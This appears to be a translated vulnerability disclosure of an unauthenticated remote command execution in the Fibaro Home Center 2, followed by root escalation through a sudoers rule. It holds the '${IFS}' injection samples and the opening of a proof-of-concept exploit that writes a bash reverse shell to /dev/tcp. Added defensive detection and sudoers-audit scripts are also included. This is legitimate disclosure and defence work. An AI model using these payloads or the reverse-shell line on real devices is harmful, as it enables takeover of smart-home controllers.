0day research: a remote command execution vulnerability in the Fibaro Home Center controller - Vulnerabilities and early warning - the black bar safety net

ID MYHACK58:62201789528
Type myhack58
Reporter Anonymous (佚名)
Modified 2017-09-29T00:00:00


In my spare time I like to look into the hardware and software of smart-home and Internet-of-Things devices, and recently I have been studying how the devices in this space handle network security. As part of that research I examined smart-home controllers. A controller is the brain of a smart-home installation: an attacker who gains access to it can take over every device it manages.

As soon as I had results I reported the vulnerabilities to the developers of the open-source controller software Domoticz. They fixed the related issues promptly after receiving the details, and I submitted fixes for several of the bugs myself:

1. Missing HttpOnly flag
2. Unauthenticated SQL injection and buffer overflow
3. Unauthenticated remote command execution (fixed by the Domoticz developers)

Straight to the point

After finishing with the open-source product I wanted to look at a commercial one, and the product I chose was the Fibaro Home Center. During this research I found a very serious network security vulnerability: as long as the web interface of a second-generation Fibaro Home Center can be reached, any attacker can exploit it to obtain full root access to the device.
The demo video above shows how a second-generation Fibaro Home Center controller is compromised.

Research process

For this research I borrowed a second-generation Fibaro Home Center controller (hereafter Fibaro HC2) from a colleague (thank you, Martijn Teelen!). The Fibaro HC2 is essentially a feature-rich x86 computer: its operating system runs from a USB flash drive, and a second USB drive serves as the system recovery medium. After opening the case I made a disk image of the USB drive. Then came the interesting part: I analysed the image in depth on a separate system, worked out how the whole thing runs, and in the process found a serious security vulnerability in the Fibaro HC2.

Only part of the PHP code behind the device's web interface is protected with ionCube encoding, and after some digging I found a tool that decrypts these PHP files without much trouble. Once they were decrypted, a file named "liliSetDeviceCommand.php" stood out: it passes a POST parameter straight into a PHP system() call, without authenticating the user and without validating the value in any way.

To find out whether the flaw is exploitable I set the "cmd1" parameter to 'ping${IFS}'. In htop (an interactive process viewer for Linux) the injected command showed up immediately, so it was confirmed that the flaw can be used to execute commands.
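The write-up describes the root cause (a POST parameter reaching system() with no authentication and no validation) and the injection form used to confirm it ('ping${IFS}'). The following script is an added example, not code from the article or from Fibaro, showing the kind of input gate such a handler lacked and the same logic used as a log-side detector. It assumes a single command parameter named cmd1 and an allowlist grammar for its value; neither the real grammar nor the parameter set beyond cmd1 is published in the article, so those are assumptions, and the request bodies are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Shell constructs that never belong in a device-command parameter. "${IFS}" is
# listed explicitly because it stands in for a space and is the form of
# injection described in the write-up; the rest are ordinary separators and
# substitutions that a system() call would honour.
SHELL_META = re.compile(r'\$\{IFS\}|\$\(|`|;|\|\||&&|\||>|<|\n|\r')

# Parameters the handler hands to the shell. Only "cmd1" is named in the
# write-up; treating this as a configurable set is an assumption of the example.
COMMAND_PARAMS = {"cmd1"}

# Allowlist for a legitimate command value. The real grammar of cmd1 is not
# published, so this pattern is an assumption for illustration.
ALLOWED_CMD = re.compile(r'^[A-Za-z0-9_.-]{1,64}$')


def inspect_post_body(body: str) -> dict:
    """Return {parameter: [reasons]} for every parameter that fails inspection.

    An empty dict means the body looks benign under these rules. The same
    function can front the handler (reject on non-empty) or run over recorded
    request bodies as a detector.
    """
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for decoded in values:
            # parse_qs has percent-decoded once; decode a second time so a
            # double-encoded payload (e.g. %2524%257BIFS%257D) is inspected in
            # the form the shell would finally see.
            candidate = unquote_plus(decoded)
            reasons = []
            hit = SHELL_META.search(candidate)
            if hit:
                reasons.append(f"shell metacharacter {hit.group(0)!r}")
            if name in COMMAND_PARAMS and not ALLOWED_CMD.match(candidate):
                reasons.append("value outside the command allowlist")
            if reasons:
                findings.setdefault(name, []).extend(reasons)
    return findings


# Constructed sample bodies, not captured traffic: one benign request followed
# by three variants of the injection pattern from the write-up.
SAMPLE_BODIES = [
    "deviceID=12&cmd1=turnOn",
    "deviceID=12&cmd1=ping${IFS}127.0.0.1",
    "deviceID=12&cmd1=ping%24%7BIFS%7D127.0.0.1",
    "deviceID=12&cmd1=turnOn%3Bid",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        verdict = inspect_post_body(body)
        print("BLOCK " if verdict else "allow ", body, verdict or "")
```

The allowlist is the part that actually closes the hole: a metacharacter blocklist is only a detection aid, because the handler should never pass user input to a shell at all. Authentication is a separate gate that has to sit in front of both.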
However, because the injected payload has to be wrapped in quotes and runs as the www-data user, what it can do is still limited by that account's permissions.

Privilege escalation

Looking at /etc/sudoers I found that www-data is actually allowed to run a small piece of code with root privileges. The screenshot shows the source of "/usr/bin/update"; reading it, I found that it is used to perform a "manual" device update. A manual update is performed by supplying a .tar.gz archive, which this code unpacks and processes. The archive must contain a run.sh script, and that script holds the commands that carry out the update (copying files and so on). So let's try putting a reverse shell in that run.sh script: do we really get a reverse shell with root privileges? After a short manual test: yes, we do!

Exploit code

Within a short time we wrote a PoC that chains the remote code execution and the privilege escalation. The code below is our exploit, already tested successfully against a second-generation Fibaro Home Center controller:

```python
#!/usr/bin/python

import requests
import argparse
import urllib
import base64
import tarfile
import os

parser = argparse.ArgumentParser(description='Fibaro RCE')
parser.add_argument('--rhost')
parser.add_argument('--lhost')
parser.add_argument('--lport')
args = parser.parse_args()

# run.sh is the script /usr/bin/update executes from the supplied archive
f = open('run.sh', 'w')
f.write('#!/bin/bash\n')
f.write('/bin/bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\n')
```
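The escalation step relies on a sudoers rule that lets the web-server account run a root-owned script which consumes an attacker-supplied archive. The following audit script is an added example, not code from the article or from Fibaro: it parses sudoers user-specification lines and flags rules that grant a web-service account commands as root, so an administrator can review each such command for untrusted input. The sudoers text is a constructed sample (only the www-data line mirrors the rule described above), the set of web-service account names is an assumption, and the parser covers plain rules only, not aliases or include directives.

```python
import re

# One sudoers user specification: user host=(runas) [TAG:] commands
SUDOERS_RULE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z_]+:\s*)*)'
    r'(?P<cmds>.+)$'
)

# Accounts under which web-facing code typically runs. www-data is the one in
# the write-up; the others are common distribution defaults (assumption).
WEB_SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "http", "lighttpd"}

# Line prefixes that are not user specifications and are skipped by this parser.
SKIP_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias", "@", "#")


def parse_sudoers(text: str) -> list:
    """Parse plain user-specification lines into dicts; skip comments and directives."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SUDOERS_RULE.match(line)
        if not m:
            continue
        # No (runas) clause means the command runs as root; "(ALL:ALL)" keeps
        # only the user part; "(:group)" has an empty user part and defaults to root.
        runas_user = (m.group("runas") or "root").split(":")[0].strip() or "root"
        rules.append({
            "user": m.group("user"),
            "host": m.group("host"),
            "runas_user": runas_user,
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "cmds": m.group("cmds").strip(),
        })
    return rules


def risky_web_rules(text: str, accounts=WEB_SERVICE_ACCOUNTS) -> list:
    """Rules that let a web-service account (or everyone) run commands as root."""
    return [
        r for r in parse_sudoers(text)
        if (r["user"] in accounts or r["user"] == "ALL")
        and r["runas_user"] in ("root", "ALL")
    ]


# Constructed sample, not the appliance's real /etc/sudoers.
SAMPLE_SUDOERS = """\
# constructed sample for this example
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
backup  ALL=(backup) NOPASSWD: /usr/bin/rsync
www-data ALL=(root) NOPASSWD: /usr/bin/update
"""

if __name__ == "__main__":
    for rule in risky_web_rules(SAMPLE_SUDOERS):
        tag = "NOPASSWD" if rule["nopasswd"] else "password required"
        print(f"REVIEW: {rule['user']} may run {rule['cmds']} as {rule['runas_user']} ({tag})")
        print("        check whether this command reads files, archives or arguments "
              "that a request to the web interface can control")
```

A rule like the www-data one is not wrong by itself; it becomes a full compromise when the command it names unpacks and executes content that the web tier can supply, which is exactly the chain above. The fix is either to remove the rule or to make the update path verify a signature on the archive before anything in it runs.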

(The original article continues on page 2.)